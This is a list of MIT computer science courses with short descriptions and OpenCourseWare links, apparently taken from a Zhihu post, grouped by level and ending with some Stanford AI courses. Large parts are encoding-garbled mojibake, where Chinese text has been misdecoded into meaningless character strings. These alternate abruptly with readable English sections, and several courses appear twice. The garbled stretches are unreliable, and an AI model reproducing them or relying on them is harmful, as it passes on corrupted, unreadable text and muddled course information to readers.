  For a long time SICP was MIT's first introductory course, and its companion textbook, *Structure and Interpretation of Computer Programs*, has long been regarded as a classic of program design; it is also the reference book for the **graduate course MIT 6.821**.

- **6.042: Mathematics for Computer Science**

  An interactive introduction to discrete mathematics oriented toward computer science and engineering. The topics fall roughly into three parts:

  - Fundamental concepts of mathematics: definitions, proofs, sets, functions, relations.
  - Discrete structures: graphs, state machines, modular arithmetic, counting.
  - Discrete probability theory.

  Link: [https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015/)

## Foundation Courses

Foundation courses are mostly offered to undergraduates.

- **6.004: Computation Structures**

  Introduces the design of digital systems and computer architecture. Emphasizes expressing all hardware designs in a high-level hardware language and synthesizing the designs. Topics include combinational and sequential circuits, instruction-set abstraction for programmable hardware, single-cycle and pipelined processor implementations, multi-level memory hierarchies, virtual memory, exceptions and I/O, and parallel systems.

  Link: [https://6004.mit.edu/web/spring20](https://link.zhihu.com/?target=https%3A//6004.mit.edu/web/spring20)

- **6.006: Introduction to Algorithms**

  Introduces mathematical modeling of computational problems. Covers the common algorithms, algorithmic paradigms, and data structures used to solve these problems, emphasizes the relationship between algorithms and programming, and introduces basic performance measures and analysis techniques.
ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011/) - **6.009: Fundamentals of Programming** ๆœฌ่ฏพ็จ‹ไป‹็ป็ผ–็จ‹็š„ๅŸบๆœฌๆฆ‚ๅฟตใ€‚ๆ—จๅœจๅŸนๅ…ปๅฐ†ๅŸบๆœฌๆ–นๆณ•ไปŽ็ผ–็จ‹่ฏญ่จ€ๅบ”็”จไบŽๆŠฝ่ฑก้—ฎ้ข˜็š„ๆŠ€่ƒฝใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ็ผ–็จ‹ๅ’Œ Python ๅŸบ็ก€็Ÿฅ่ฏ†ใ€่ฎก็ฎ—ๆฆ‚ๅฟตใ€่ฝฏไปถๅทฅ็จ‹ใ€็ฎ—ๆณ•ๆŠ€ๆœฏใ€ๆ•ฐๆฎ็ฑปๅž‹ๅ’Œ้€’ๅฝ’ใ€‚ๅฎž้ชŒ็ป„ไปถๅŒ…ๆ‹ฌ่ฝฏไปถ่ฎพ่ฎกใ€ๆ–ฝๅทฅๅ’Œ่ฎพ่ฎกๅฎžๆ–ฝใ€‚ ๅœฐๅ€๏ผš[https://py.mit.edu/spring20](https://link.zhihu.com/?target=https%3A//py.mit.edu/spring20) - **6.004 ่ฎก็ฎ—็ป“ๆž„** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computation Structures (Spring 2017)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-004-computation-structures-spring-2017) - **6.005 ่ฝฏไปถๆž„ๅปบ๏ผˆJava๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Construction (Spring 2016)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-005-software-construction-spring-2016/) Java็š„ๅŸบ็ก€่ฏพ็จ‹๏ผŒๅฏไปฅๅ’Œ6.031ไธ€่ตทๅญฆไน ใ€‚ - **6.006 ็ฎ—ๆณ•ๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Algorithms (Fall 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-006-introduction-to-algorithms-fall-2011) - **6.008 ๆŽฅๅฃๆŠ€ๆœฏๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Inference๏ผˆ2014๏ผ‰](https://link.zhihu.com/?target=http%3A//web.mit.edu/6.008/www/videos/) - **6.009 ็จ‹ๅบ่ฎพ่ฎกๅŸบ็ก€** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Fundamentals of Programming](https://link.zhihu.com/?target=https%3A//py.mit.edu/spring21) - **6.033 ่ฎก็ฎ—ๆœบ็ณป็ปŸ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer System Engineering (Spring 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-033-computer-system-engineering-spring-2018) - **6.034 ไบบๅทฅๆ™บ่ƒฝ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Artificial Intelligence (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010)ใ€[Artificial Intelligence (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-spring-2005) - **6.041 ๆฆ‚็Ž‡็ณป็ปŸๅˆ†ๆžๅ’Œๅบ”็”จๆฆ‚็Ž‡่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Probabilistic Systems Analysis and Applied Probability (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-041-probabilistic-systems-analysis-and-applied-probability-fall-2010)ใ€[Probabilistic Systems Analysis and Applied Probability (Fall 2013)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-041sc-probabilistic-systems-analysis-and-applied-probability-fall-2013) - **6.042J ่ฎก็ฎ—ๆœบ็ง‘ๅญฆไธญ็š„ๆ•ฐๅญฆ๏ผˆ็ฆปๆ•ฃๆ•ฐๅญฆ๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Mathematics for Computer Science (Spring 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015) ## ่ฟ›้˜ถ็ง‘็›ฎ ่ฟ›้˜ถ็ง‘็›ฎๅˆ™ๆ˜ฏไธบไบ†ๅคงไธ‰ๅคงๅ››ไปฅๅŠ็ ”ไธ€ๅŒๅญฆ่ฎพ็ซ‹ใ€‚ ไปฅไธ‹่ฏพ็จ‹ๅช้œ€่ฆ้€‰ๆ‹ฉไธคไธ‰้—จ่ฏพๆฅๅญฆไน ๅฐฑๅฏไปฅไบ†ใ€‚ - **6.031 ่ฝฏไปถๆž„ๅปบ๏ผˆJava๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Construction](https://link.zhihu.com/?target=http%3A//web.mit.edu/6.031/www/fa20/) 
่ฟ™้—จ่ฏพไธป่ฆๅญฆ็š„ๆ˜ฏJava๏ผŒๆฒกๆœ‰ๅ‚่€ƒไนฆ๏ผŒ่ฏพ็จ‹้“พๆŽฅๆœ‰ๆฏ”่พƒ่ฏฆ็ป†็š„็บฟไธŠๆ•™็จ‹๏ผ›ๅฏไปฅๅ’Œ6.005ไธ€่ตทๅญฆไน ใ€‚ - **6.033 ่ฎก็ฎ—ๆœบ็ณป็ปŸๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[6.033](https://link.zhihu.com/?target=http%3A//student.mit.edu/catalog/m6a.html%236.033) Computer Systems Engineering (12) - **6.035 ่ฎก็ฎ—ๆœบ่ฏญ่จ€ๅทฅ็จ‹ โ˜…**โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer Language Engineering (Spring 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-035-computer-language-engineering-spring-2010)ใ€[Computer Language Engineering (SMA 5502) (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-035-computer-language-engineering-sma-5502-fall-2005) - **6.036 ๆœบๅ™จๅญฆไน ๅฏผ่ฎบ** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Machine Learning (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-036-introduction-to-machine-learning-fall-2020) - **6.045J ่‡ชๅŠจๆœบใ€ๅฏ่ฎก็ฎ—ๆ€งๅ’Œๅคๆ‚ๆ€ง** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Automata, Computability, and Complexity (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-045j-automata-computability-and-complexity-spring-2011) - **6.046J ็ฎ—ๆณ•็š„่ฎพ่ฎกไธŽๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Design and Analysis of Algorithms (Spring 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015) - **6.073 ่ง†้ข‘ๆธธๆˆๅผ€ๅ‘** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Creating Video Games (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/comparative-media-studies-writing/cms-611j-creating-video-games-fall-2014) - **6.080/6.089 ่ฎก็ฎ—ๆœบ็ง‘ๅญฆ็š„ไผŸๅคง็†่ฎบโ˜…โ˜…โ˜…โ˜…โ˜…** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Great Ideas in Theoretical Computer Science (Spring 2008)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-080-great-ideas-in-theoretical-computer-science-spring-2008) - **6.170 ่ฝฏไปถๅทฅ็จ‹๏ผˆๅ‰็ซฏๅผ€ๅ‘JavaScript๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Studio](https://link.zhihu.com/?target=https%3A//canvas.mit.edu/courses/4415) ่ฟ™้—จ่ฏพไปฅๅ‰ๆ˜ฏไฝฟ็”จRuby็š„Railsๅ’ŒJavaScriptๆฅๆญๅปบไธ€ไธช**ๅ…จๆ ˆๅผ€ๅ‘้กน็›ฎ**ใ€‚่€Œ็Žฐๅœจๅˆ™ๅฎŒๅ…จๆ˜ฏไฝฟ็”จJavaScriptๆฅๅšๅ…จๆ ˆๅผ€ๅ‘๏ผŒๅ†…ๅฎนๅŒ…ๅซNodeใ€MySQLใ€React็ญ‰ใ€‚ - **6.171 Webๅบ”็”จๅผ€ๅ‘ไธŽ่ฝฏไปถๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Software Engineering for Web Applications (Fall 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-171-software-engineering-for-web-applications-fall-2003/) ่ฟ™้—จ่ฏพๅฏไปฅๅ’Œ6.170ไธ€่ตทๅญฆ๏ผŒไธป่ฆๅฆ‚ไฝ•ๆž„ๅปบ้ซ˜ๅนถๅ‘ใ€ๅฎ‰ๅ…จใ€ๅฏ้ ็ญ‰็š„Webๅบ”็”จ - **6.172 ่ฝฏไปถ็ณป็ปŸ็š„ๆ€ง่ƒฝ๏ผˆC่ฏญ่จ€๏ผ‰** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Performance Engineering of Software Systems (Fall 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-172-performance-engineering-of-software-systems-fall-2018/) ่ฟ™้—จ่ฏพไธป่ฆๆ•™ไฝ ๅฆ‚ไฝ•ๆž„ๅปบๅคงๅž‹้ซ˜ๆ€ง่ƒฝ็š„่ฝฏไปถ็ณป็ปŸ๏ผŒๅŒ…ๅซๆ€ง่ƒฝๅˆ†ๆžใ€้ซ˜ๆ€ง่ƒฝใ€็ผ“ๅญ˜ไผ˜ๅŒ–ใ€ๅนถ่กŒ็จ‹ๅบ็ญ‰๏ผŒไฝฟ็”จ็š„ๆ˜ฏC่ฏญ่จ€ใ€‚่ฟ™้—จ่ฏพๆฒกๆœ‰ๅ‚่€ƒๆ•™ๆ๏ผŒๅ€’ๆ˜ฏๆœ‰ไธ€ๅ †ๆ–‡็ซ ้œ€่ฆไฝ ้˜…่ฏป๏ผŒๅ…ทไฝ“ๅฏไปฅๅŽปๅฎ˜็ฝ‘็š„Readingsไบ†่งฃใ€‚ - **6.175 ่ฎก็ฎ—ๆœบไฝ“็ณป็ป“ๆž„** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Constructive Computer 
  Taking this course requires one object-oriented programming language (Java or C++) or one functional language (ML or Haskell), plus 6.004 and 6.005.

- **6.207J Networks**

  Course page: [Networks (Spring 2018)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/economics/14-15j-networks-spring-2018)

- **6.338J Parallel Computing**

  Course page: [Parallel Computing (Fall 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-337j-parallel-computing-fall-2011)

- **6.801 Machine Vision**

  Course page: [Machine Vision (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-801-machine-vision-fall-2020)

- **6.803 The Human Intelligence Enterprise**

  Course page: [The Human Intelligence Enterprise (Spring 2019)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-803-the-human-intelligence-enterprise-spring-2019)

- **6.804J Computational Cognitive Science**

  Course page: [Computational Cognitive Science (Fall 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/brain-and-cognitive-sciences/9-66j-computational-cognitive-science-fall-2004)

- **6.811 Principles and Practice of Assistive Technology**

  Course page: [Principles and Practice of Assistive Technology (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-811-principles-and-practice-of-assistive-technology-fall-2014)

- **6.813 User Interface Design and Implementation**

  Course page: [User Interface Design and Implementation (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-831-user-interface-design-and-implementation-spring-2011)

- **6.815/6.865 Digital and Computational Photography**

  Course page: [Digital and Computational Photography](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/media-arts-and-sciences/mas-531-computational-camera-and-photography-fall-2009/syllabus/)

- **6.816/6.189 The Art of Multiprocessor Programming**

  Course page: [Multicore Programming Primer (January IAP 2007)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-189-multicore-programming-primer-january-iap-2007)

  This course is not publicly available; all that is known is that its reference textbook is *The Art of Multiprocessor Programming*.

- **6.819/6.869: Advances in Computer Vision**

  Course page: [Advances in Computer Vision (12)](https://link.zhihu.com/?target=http%3A//6.869.csail.mit.edu/sp21/)

- **6.820 Fundamentals of Program Analysis**

  Course page: [Fundamentals of Program Analysis (Fall 2015)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-820-fundamentals-of-program-analysis-fall-2015)

- **6.837 Computer Graphics**

  Course page: [Computer Graphics (Fall 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-837-computer-graphics-fall-2012/)

- **18.404/6.840 Theory of Computation**

  Course page: [Theory of Computation (12)](https://link.zhihu.com/?target=https%3A//math.mit.edu/~sipser/18404/)

## Specialization Courses

- **6.034: Artificial Intelligence**

  Introduces students to the basic knowledge representation, problem-solving, and learning methods of artificial intelligence. After completing 6.034, students should be able to develop intelligent systems by assembling solutions to concrete computational problems; understand the role of knowledge representation, problem solving, and learning
ๅœจๆ™บ่ƒฝ็ณป็ปŸๅทฅ็จ‹ไธญ็š„ไฝœ็”จ๏ผ›ๅนถ็†่งฃ่งฃๅ†ณ้—ฎ้ข˜ใ€่ง†่ง‰ๅ’Œ่ฏญ่จ€ๅœจไปŽ่ฎก็ฎ—่ง’ๅบฆ็†่งฃไบบ็ฑปๆ™บๅŠ›ๆ–น้ข็š„ไฝœ็”จใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-034-artificial-intelligence-fall-2010/) [https://ai6034.mit.edu/wiki/index.php?title=Main_Page](https://link.zhihu.com/?target=https%3A//ai6034.mit.edu/wiki/index.php%3Ftitle%3DMain_Page) - **6.033: Computer Systems Engineering (CI-M)** ๆœฌ่ฏพ็จ‹ๅŒ…ๆ‹ฌๆœ‰ๅ…ณ่ฎก็ฎ—ๆœบ่ฝฏไปถๅ’Œ็กฌไปถ็ณป็ปŸๅทฅ็จ‹็š„ไธป้ข˜ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌๆŽงๅˆถๅคๆ‚ๆ€ง็š„ๆŠ€ๆœฏ๏ผ›ไฝฟ็”จๅฎขๆˆท็ซฏ - ๆœๅŠกๅ™จ่ฎพ่ฎกใ€ๆ“ไฝœ็ณป็ปŸ็š„ๅผบๅคงๆจกๅ—ๅŒ–๏ผ›ๆ€ง่ƒฝ๏ผŒ็ฝ‘็ปœ๏ผ›ๅ‘ฝๅ๏ผ›ๅฎ‰ๅ…จๅ’Œ้š็ง๏ผ›ๅฎน้”™็ณป็ปŸใ€ๅนถๅ‘ๆดปๅŠจ็š„ๅŽŸๅญๆ€งๅ’Œๅ่ฐƒๆ€งไปฅๅŠๆขๅค๏ผ›่ฎก็ฎ—ๆœบ็ณป็ปŸๅฏน็คพไผš็š„ๅฝฑๅ“ใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.033/www/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.033/www/) - **6.031: Elements of Software Construction** ไป‹็ป่ฝฏไปถๅผ€ๅ‘็š„ๅŸบๆœฌๅŽŸๅˆ™ๅ’ŒๆŠ€ๆœฏ๏ผšๅฆ‚ไฝ•็ผ–ๅ†™ๅฎ‰ๅ…จๆ— ้”™่ฏฏใ€ๆ˜“ไบŽ็†่งฃไธ”ๆ˜“ไบŽๆ›ดๆ”น็š„่ฝฏไปถใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ่ง„่Œƒๅ’Œไธๅ˜๏ผ›ๆต‹่ฏ•ใ€ๆต‹่ฏ•็”จไพ‹็”Ÿๆˆๅ’Œ่ฆ†็›–่Œƒๅ›ด๏ผ›ๆŠฝ่ฑกๆ•ฐๆฎ็ฑปๅž‹ๅ’Œ่กจ็คบ็‹ฌ็ซ‹ๆ€ง๏ผ›้ขๅ‘ๅฏน่ฑก็ผ–็จ‹็š„่ฎพ่ฎกๆจกๅผ๏ผ›ๅนถๅ‘็ผ–็จ‹๏ผŒๅŒ…ๆ‹ฌๆถˆๆฏไผ ้€’ๅ’Œๅ…ฑไบซๅ†…ๅญ˜ๅนถๅ‘๏ผŒๆญป้”๏ผ›ๅ‡ฝๆ•ฐ็ผ–็จ‹๏ผŒๅ…ทๆœ‰ไธๅฏๅ˜็š„ๆ•ฐๆฎๅ’Œ้ซ˜้˜ถๅ‡ฝๆ•ฐใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.031/www/sp20/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.031/www/sp20/) - **6.036 Introduction to Machine Learning** ไปŽๅปบๆจกๅ’Œ้ข„ๆต‹็š„่ง’ๅบฆไป‹็ปๆœบๅ™จๅญฆไน ็š„ๅŽŸๅˆ™ใ€็ฎ—ๆณ•ๅ’Œๅบ”็”จ๏ผ›ๅˆถๅฎšๅญฆไน ้—ฎ้ข˜๏ผ›ไปฃ่กจๆ€งใ€่ฟ‡ๅบฆๆ‹Ÿๅˆใ€ๆฆ‚ๆ‹ฌๆ€ง๏ผ›่š็ฑปใ€ๅˆ†็ฑปใ€ๆฆ‚็Ž‡ๅปบๆจก๏ผ›ๅ’Œ่ฏธๅฆ‚ๆ”ฏๆŒๅ‘้‡ๆœบใ€้šๅผ้ฉฌๅฐ”็ง‘ๅคซๆจกๅž‹ๅ’Œ็ฅž็ป็ฝ‘็ปœ็ญ‰ๆ–นๆณ•ใ€‚ ๅœฐๅ€๏ผš[https://openlearninglibrary.mit.edu/courses/course-v1:MITx+6.036+1T2019/about](https://link.zhihu.com/?target=https%3A//openlearninglibrary.mit.edu/courses/course-v1%3AMITx%2B6.036%2B1T2019/about) - **6.045: Automata, Computability, and Complexity** ๅ…ณไบŽ่ฎก็ฎ—ๅฎšไน‰้—ฎ้ข˜็š„ๆ•ฐๅญฆไป‹็ป๏ผŒไปฅๅŠ่ฎก็ฎ—ๆœบๅฏไปฅ่งฃๅ†ณ็š„้—ฎ้ข˜ใ€‚่€ƒ่™‘้€š่ฟ‡ๆœ‰้™็š„่‡ชๅŠจๆœบ๏ผŒ็”ต่ทฏ๏ผŒๅ›พ็ตๆœบๅ’Œ้€šไฟกๅคๆ‚ๆ€งๅฏไปฅๆœ‰ๆ•ˆ่งฃๅ†ณๅ“ชไบ›้—ฎ้ข˜ใ€‚ๅœจๆŸไบ›ๆƒ…ๅ†ตไธ‹๏ผŒไธบ้—ฎ้ข˜ๆไพ›ๅฎŒๆ•ด๏ผŒไธฅๆ ผ็š„็ญ”ๆกˆใ€‚ๅปบ็ซ‹ๆ นๆฎ้šพๅบฆๅฏน่ฎก็ฎ—้—ฎ้ข˜่ฟ›่กŒๅˆ†็ฑป็š„ๆŠ€่ƒฝใ€‚่ฎจ่ฎบๅ…ถไป–ๅŸบๆœฌ้—ฎ้ข˜๏ผŒๅŒ…ๆ‹ฌ Church-Turing ่ฎบๆ–‡๏ผŒP ไธŽ NP ้—ฎ้ข˜ไปฅๅŠ้šๆœบๆ€งใ€‚ ๅœฐๅ€๏ผš[https://people.csail.mit.edu/rrw/6.045-2020/](https://link.zhihu.com/?target=https%3A//people.csail.mit.edu/rrw/6.045-2020/) - **6.046: Design and Analysis of Algorithms** ้ซ˜ๆ•ˆ็ฎ—ๆณ•็š„่ฎพ่ฎกไธŽๅˆ†ๆžๆŠ€ๆœฏ๏ผŒๅผบ่ฐƒๅœจๅฎž่ทตไธญๆœ‰็”จ็š„ๆ–นๆณ•ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌๆŽ’ๅบ๏ผ›ๆœ็ดขๆ ‘ใ€ๅ †ๅ’Œๅ“ˆๅธŒ๏ผ›ๅˆ†่€Œๆฒปไน‹๏ผ›ๅŠจๆ€็ผ–็จ‹๏ผ›่ดชๅฉช็ฎ—ๆณ•๏ผ›ๆ‘Š้”€ๅˆ†ๆž๏ผ›ๅ›พๅฝข็ฎ—ๆณ•๏ผ›ๅ’Œๆœ€็Ÿญ็š„่ทฏๅพ„ใ€‚้ซ˜็บงไธป้ข˜ๅฏ่ƒฝๅŒ…ๆ‹ฌ็ฝ‘็ปœๆต๏ผ›่ฎก็ฎ—ๅ‡ ไฝ•๏ผ›ๆ•ฐๅญ—็†่ฎบ็ฎ—ๆณ•๏ผ›ๅคš้กนๅผๅ’Œ็Ÿฉ้˜ต่ฎก็ฎ—๏ผ›็ผ“ๅญ˜๏ผ›ๅ’Œๅนถ่กŒ่ฎก็ฎ—ใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-046j-design-and-analysis-of-algorithms-spring-2015/) ## ้ซ˜็บง็ง‘็›ฎ ้ซ˜็บง็ง‘็›ฎๅพˆๅคš๏ผŒ่ฟ™้‡ŒๅชๆŽจ่ไธ€ไบ›ๆฏ”่พƒ็Ÿฅๅ&ไธชไบบๆ„Ÿๅ…ด่ถฃ็š„๏ผš - **6.824: Distributed Systems** 
ๆœฌ่ฏพ็จ‹ไป‹็ปๅˆ†ๅธƒๅผ็ณป็ปŸ่ฎพ่ฎก็š„ๆŠฝ่ฑกๅ’Œๅฎž็ŽฐๆŠ€ๆœฏใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ๏ผšๆœๅŠกๅ™จ่ฎพ่ฎกใ€็ฝ‘็ปœ็ผ–็จ‹ใ€ๅ‘ฝๅใ€ๅญ˜ๅ‚จ็ณป็ปŸใ€ๅฎ‰ๅ…จๆ€งๅ’Œๅฎน้”™่ƒฝๅŠ›ใ€‚ ๅœฐๅ€๏ผš[https://pdos.csail.mit.edu/6.824/](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.824/) - **6.828: Operating System Engineering** ๆœฌ่ฏพ็จ‹็ ”็ฉถๆ“ไฝœ็ณป็ปŸๅทฅ็จ‹็š„ๅŸบๆœฌ่ฎพ่ฎกๅ’Œๅฎž็Žฐ็†ๅฟตใ€‚่ฎฒๅบงไปฅ UNIX ๅ’Œ็ ”็ฉถ่ฎบๆ–‡็š„็ ”็ฉถไธบๅŸบ็ก€ใ€‚ไธป้ข˜ๅŒ…ๆ‹ฌ่™šๆ‹Ÿๅ†…ๅญ˜ใ€็บฟ็จ‹ใ€ไธŠไธ‹ๆ–‡ๅˆ‡ๆขใ€ๅ†…ๆ ธใ€ไธญๆ–ญใ€็ณป็ปŸ่ฐƒ็”จใ€่ฟ›็จ‹้—ด้€šไฟกใ€ๅ่ฐƒๅ’Œ่ฝฏไปถๅ’Œ็กฌไปถไน‹้—ด็š„ไบคไบ’ใ€‚ๅ•ไธชๅฎž้ชŒๅฎคไปปๅŠกๆถ‰ๅŠๅœจ C ไธญๅฎžๆ–ฝๅฐๅž‹ๆ“ไฝœ็ณป็ปŸ๏ผŒๅนถๅธฆๆœ‰ไธ€ไบ› x86 ็ป„ไปถใ€‚ ๅœฐๅ€๏ผš[https://pdos.csail.mit.edu/6.828/2019/schedule.html](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.828/2019/schedule.html) - **6.829: Computer Networks** ๅ…จ็ƒ็ฝ‘็ปœๅŸบ็ก€่ฎพๆ–ฝๅฆ‚ไฝ•ๅทฅไฝœ๏ผŒๅ…ถๅŸบ็ก€ๆ˜ฏไป€ไนˆ่ฎพ่ฎกๅŽŸๅˆ™๏ผŸๅœจๅฎž่ทตไธญ๏ผŒ่ฟ™ไบ›่ฎพ่ฎกๅŽŸๅˆ™ๅœจๅ“ชไบ›ๆ–น้ขๅ—ๅˆฐไบ†ๆŸๅฎณ๏ผŸๆˆ‘ไปฌๅฆ‚ไฝ•ไฝฟๅฎƒๅœจๅฝ“ไปŠไธ–็•Œๆ›ดๅฅฝๅœฐๅทฅไฝœ๏ผŸ้ขๅฏนๅฟซ้€Ÿๅขž้•ฟ็š„่ง„ๆจกๅ’Œๅผ‚่ดจๆ€ง๏ผŒๆˆ‘ไปฌๅฆ‚ไฝ•็กฎไฟๅฎƒๅœจๆœชๆฅ่ฟไฝœ่‰ฏๅฅฝ๏ผŸๅบ”่ฏฅๅฆ‚ไฝ•็ผ–ๅ†™ Internet ๅบ”็”จ็จ‹ๅบ๏ผŒไปฅไพฟๅฎƒไปฌ่ƒฝๅคŸไธบ่‡ชๅทฑๅ’Œไฝฟ็”จๅŸบ็ก€็ป“ๆž„็š„ๅ…ถไป–ไบบ่Žทๅพ—ๆœ€ไฝณๆ€ง่ƒฝ๏ผŸ่ฟ™ไบ›ๆ˜ฏๆœฌ่ฏพ็จ‹ไธญๆญฃๅœจๅค„็†็š„ไธ€ไบ›้—ฎ้ข˜ใ€‚ๆœฌ่ฏพ็จ‹ๅฐ†ไพง้‡ไบŽๅคงๅž‹่”็ฝ‘็ณป็ปŸ็š„่ฎพ่ฎกใ€ๅฎžๆ–ฝใ€ๅˆ†ๆžๅ’Œ่ฏ„ไผฐใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.829/www/currentsemester/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.829/www/currentsemester/) - **6.830/6.814: Database Systems** ๆœฌ่ฏพ็จ‹ไพๆ‰˜ๆ•ฐๆฎๅบ“็คพๅŒบ็š„ไธป่ฆ้˜…่ฏป่ต„ๆ–™๏ผŒๅ‘็ ”็ฉถ็”Ÿไป‹็ปๆ•ฐๆฎๅบ“็ณป็ปŸ็š„ๅŸบ็ก€๏ผŒ้‡็‚นไป‹็ปๅ…ณ็ณปไปฃๆ•ฐๅ’Œๆ•ฐๆฎๆจกๅž‹ใ€ๆžถๆž„่ง„่ŒƒๅŒ–ใ€ๆŸฅ่ฏขไผ˜ๅŒ–ๅ’Œไบ‹ๅŠกใ€‚ ๅœฐๅ€๏ผš[http://db.csail.mit.edu/6.830/index.phpdb.csail.mit.edu/6.830/index.php](https://link.zhihu.com/?target=http%3A//db.csail.mit.edu/6.830/index.php) ## ไบบๅทฅๆ™บ่ƒฝ&AI - [ๅดๆฉ่พพๆœบๅ™จๅญฆไน ](https://www.coursera.org/learn/machine-learning) - [CS224d: Deep Learning for Natural Language Processing](http://cs224d.stanford.edu/syllabus.html) - [CS221: Artificial Intelligence: Principles and Techniques](http://web.stanford.edu/class/cs221/) - [CS 20: Tensorflow for Deep Learning Research](https://web.stanford.edu/class/cs20si/syllabus.html) - [CS234: Reinforcement Learning](http://web.stanford.edu/class/cs234/schedule.html) - Amazon ๆŽๆฒๅคง็ฅžๅ‡บ็š„[ใ€ŠๅŠจๆ‰‹ๅญฆๆทฑๅบฆๅญฆไน ใ€‹](https://discuss.gluon.ai/t/topic/753) - 